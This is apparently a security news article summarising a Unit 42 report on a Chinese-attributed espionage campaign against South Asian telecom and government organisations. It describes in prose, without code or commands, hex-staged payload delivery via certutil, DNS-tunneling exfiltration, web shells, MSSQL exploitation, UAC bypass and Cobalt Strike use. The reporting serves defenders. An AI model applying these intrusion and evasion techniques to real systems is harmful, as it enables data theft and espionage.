Cybercriminals Exploit Public-Facing IIS, Apache, and SQL Servers to Breach Gov & Telecom Systems

A recent investigation by Unit 42 of Palo Alto Networks has uncovered a sophisticated, state-sponsored cyberespionage operation, tracked as CL-STA-0048.

The campaign targeted high-value organizations in South Asia, particularly a telecommunications company.

Employing rare tactics and tools, the attackers leveraged unique payload delivery methods and exploited vulnerabilities in widely used services such as IIS, Apache Tomcat, and MSSQL services.

Analysts attribute the campaign with moderate-to-high confidence to Chinese-origin threat actors based on their tactics, techniques, and victimology.

This operation focused on extracting sensitive data, including government personnel records and organizational secrets, while evading detection through advanced obfuscation methods.

Unit 42 classifies this activity under the umbrella of advanced persistent threats (APTs), underscoring its nation-state-level sophistication.

Unique Payload Delivery and Exfiltration Techniques

A standout technique in this campaign is what Unit 42 has termed “Hex Staging.”

This method involves delivering payloads in hex-encoded chunks before reconstructing them into executable code on the target system.

By using native tools like certutil to decode the payloads, the attackers avoided triggering conventional detection mechanisms.

Hex Staging has been used to deploy a range of malicious tools, including components of PlugX, a Remote Access Trojan (RAT) frequently linked to Chinese-speaking threat groups.

The attackers also employed an unorthodox exfiltration method involving DNS tunneling.

By formatting stolen data into DNS queries and sending them via ping requests to a controlled DNS logging service, they stealthily transmitted sensitive information.

This approach bypassed traditional data exfiltration monitoring tools.

Exploitation of Multiple Services and Escalation Tactics

The attackers showcased remarkable adaptability, sequentially targeting vulnerabilities within IIS, Apache Tomcat, and unpatched MSSQL servers.

Initial attempts to exploit IIS web servers through web shells were blocked by Palo Alto Networks’ Cortex XDR solution.

Following this, the attackers pivoted to Apache Tomcat servers, deploying a ColdFusion-based web shell, which was also thwarted.

Success was finally achieved with an MSSQL server, granting the attackers access to carry out reconnaissance and execute further payloads.

To escalate privileges, the threat actors utilized advanced tools like SspiUacBypass and components of the Potato Suite.

These tools allowed them to bypass User Account Control (UAC) and execute commands with elevated privileges.

The operation’s second phase saw the deployment of Cobalt Strike beacons, an industry-favored tool for post-compromise activities.

Using the Hex Staging method, the attackers installed Cobalt Strike loaders on targeted systems, enabling them to exfiltrate data and deploy additional malware.

A notable focus was placed on stealing valuable database records.

Attackers created unauthorized privileged database users and executed malicious SQL scripts to harvest and aggregate sensitive client data, such as names, mobile numbers, and personal identifiers.

The connection to Chinese threat ecosystems is further highlighted by the use of PlugX, Winos4.0-based malware, and specific command-and-control (C2) IPs and domains, which overlap with patterns seen in other Chinese APT campaigns, including those linked to a group known as DragonRank.

This campaign underscores the critical necessity of proactive cybersecurity defenses.

Organizations are urged to prioritize patching known vulnerabilities in commonly exploited services and to employ robust monitoring tools capable of detecting advanced tactics, including obfuscated payload delivery and DNS-based exfiltration.

The identified campaign reaffirms the persistent threat posed by nation-state actors targeting sensitive organizations.

Vigilant IT hygiene, routine vulnerability assessments, and leveraging advanced cybersecurity solutions remain paramount to mitigating such advanced attacks.

Are you from SOC/DFIR Teams? – Analyse Malware Files & Links with ANY.RUN Sandox -> Try for Free